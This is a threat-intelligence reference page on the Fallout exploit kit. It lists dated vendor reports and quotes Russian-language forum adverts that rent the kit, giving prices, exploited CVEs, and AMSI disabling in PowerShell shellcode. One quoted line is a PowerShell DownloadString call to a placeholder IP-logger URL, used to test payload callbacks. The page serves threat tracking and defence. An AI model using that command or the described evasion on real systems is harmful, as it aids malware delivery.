ReferencesExploit Kits

Fallout

Status: Active

References:
  • Hello "Fallout Exploit Kit" - 2018-09-01 - Nao-Sec - Nao_Sec Fallout CVE-2018-4878 CVE-2018-8174

    • More Reading:

  • CVE-2018-4878 (Flash Player up to 28.0.0.137) and Exploit Kits - 2018-03-09 - MDNC - Kafeine CVE-2018-4878 WordsJS GreenFlash Sundown Magnitude RIG Fallout Hermes
  • CVE-2018-8174 (VBScript Engine) and Exploit Kits - 2018-05-25 - MDNC - Kafeine CVE-2018-8174 RIG Magnitude GrandSoft Fallout Kaixin Hunter GreenFlash Sundown Smokebot
  • CVE-2018-15982 (Flash Player up to 31.0.0.153) and Exploit Kits - 2019-01-16 - MDNC - Kafeine CVE-2018-15982 Fallout Underminer Spelevo GreenFlash Sundown
  • Fallout += https and CVE-2018-15982 - 2019-01-16 - Twitter - Kafeine CVE-2018-15982 Fallout Bikarys
  • New KPOT v2.0 stealer brings zero persistence and in-memory features to silently steal credentials - 2019-05-09 - Proofpoint - Dennis Schwarz - Proofpoint Staff KPOT Fallout RIG
  • SystemBC is like Christmas in July for SOCKS5 Malware and Exploit Kits - 2019-08-01 - Proofpoint - Kade Karmon - Kafeine - Dennis Schwarz - Proofpoint Staff SystemBC Fallout RIG Danabot PowerEnum
  • Exploit kits: fall 2019 review - 2019-11-19 - Malwarebytes - Jérôme Segura Fallout Underminer Magnitude Spelevo RIG GrandSoft Kaixin
  • Buer, a new loader emerges in the underground marketplace - 2019-12-04 - Proofpoint - Kelsey Merriman - Dennis Schwarz - Kafeine - Axel F - Proofpoint Staff Buer Ostap Trickbot Fallout

    • Screenshots:

    Advert:

    [АРЕНДА] Связка эксплойтов Fallout

    2018-09-07

    Предлагается полуприватное комплексное решение для конвертации Вашего трафика в инсталлы.

    СВЯЗКА ЭКСПЛОЙТОВ

    АНТИ-БОТ СИСТЕМА

    Условия

    Запрещено:

    В случае обнаружения, сервер деактивируется без возврата оплаты. Контакт попадает в блек-лист. Администрация форума уведомляется о факте барыжничества.

    Стоимость:

    1-дневный тест(выдается один поток на общем сервере) - 100$

    Неделя - 350$

    Месяц - 1200$

    Набор ограничен. Всего 25 мест. Первый контакт ПМ. В сотрудничестве может быть отказано без объяснения причин.

    В случае, если у вас что-то там с трафиком - манибэка не будет(проверяем на трафе A.Sever)

    Манибэк возможен только, если косяк на моей стороне.

    FalloutEK категорически рекомендует использовать сервера для своих проектов от sweetMika7. Наилучший сервис и обслуживание только у нее!

    Ее топ

    https://i.imgur.com/9St2nld.gif

    [АРЕНДА] Связка эксплойтов Fallout

    2019-01-16

    Итак! Тяжкие работы по восстановлению всей инфраструктуры связки закончены, были проведены тесты и в данный момент связка работает в полном объеме. Также были произведены множество правок и изменений.

    Изменения:

    1. Увеличена производительность

    2. Полностью переработан механизм обфускации кода и генерации лэндинга.

    3. Убран CVE-2018-8373 на переработку. В данный момент сплоит ведет себя не стабильно.

    4. Добавлен новый флеш сплоит CVE-2018-15982.

    5. Для запуска повершелл в шеллкод добавлен код отключения AMSI

    6. Кучка мелких правок

    ИЗМЕНЕНА ЦЕНОВАЯ ПОЛИТИКА

    Неделя 400$

    Месяц 1300$

    В данный момент при проверке отстука софта со связки было выявлено:

    1. Отстук EXE на уровне 80-90%

    2. Отстук PowerShell на уровне 95-100%

    Для теста отстука EXE была написана стучалка с использованием wininet c отстуком на iplogger

    Для теста отстука PowerShell был использован следующий код:

    (New-Object Net.WebClient).DownloadString(‘#IPLOGGERLINK#’);

    Скрины с теста отстука PowerShell: